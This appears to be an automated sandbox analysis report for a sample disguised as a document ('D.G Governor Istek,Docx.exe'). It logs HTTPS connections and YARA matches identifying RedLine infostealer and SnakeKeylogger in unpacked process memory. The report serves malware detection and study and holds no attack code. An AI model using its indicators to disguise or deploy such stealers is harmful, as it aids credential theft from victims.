          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
          Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
          Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
          Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
          Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
          Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
          Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
          Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
          Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.217.32.148:443 -> 192.168.2.5:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49758 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49799 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50080 version: TLS 1.2
          Source: Yara matchFile source: Process Memory Space: D.G Governor Istek,Docx.exe PID: 1560, type: MEMORYSTR

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 13.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31d76478.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31d76478.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1d270f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1d270f08.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.3092b98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e32e790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1e32e790.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31dae790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31dae790.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.3092c896.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.3092c896.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.370d0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.370d0000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.Cneehezx.PIF.21496c78.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e2f6478.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1e2f6478.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31d76478.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31d76478.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.342cb98e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.342cb98e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.30ca0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.30ca0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.330f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.330f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.30ca0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.30ca0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 13.2.xzeheenC.pif.3092c896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.3092c896.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 6.2.Cneehezx.PIF.21496c78.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.35556478.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.35556478.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.36aa0f08.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.36aa0f08.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.D.G Governor Istek,Docx.exe.21ab13d8.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1d270000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1d270000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e2f5570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1e2f5570.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.1.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1f670000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1f670000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.3.xzeheenC.pif.2ed4e980.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.3.xzeheenC.pif.2ed4e980.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.342cc896.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.342cc896.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.36aa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.36aa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.30ca0f08.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.30ca0f08.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.330f0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.330f0000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 13.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.3558e790.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.3558e790.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.370d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.370d0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31d75570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31d75570.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1d270000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1d270000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1ce5c896.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1ce5c896.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.36aa0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.36aa0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 6.2.Cneehezx.PIF.214d58a8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 9.2.xzeheenC.pif.342cc896.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.342cc896.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31dae790.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31dae790.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e2f5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 13.2.xzeheenC.pif.30ca0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.3.xzeheenC.pif.2ed4e980.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.3.xzeheenC.pif.2ed4e980.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.35555570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.3092b98e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.31d75570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.36aa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 4.2.xzeheenC.pif.1ce5b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.35555570.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.342cb98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 13.2.xzeheenC.pif.3092b98e.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.30ca0f08.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 4.2.xzeheenC.pif.1e2f5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 13.2.xzeheenC.pif.31d75570.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.36aa0000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.342cb98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.35555570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.35556478.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 9.2.xzeheenC.pif.35555570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 9.2.xzeheenC.pif.35556478.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.D.G Governor Istek,Docx.exe.21a1c948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
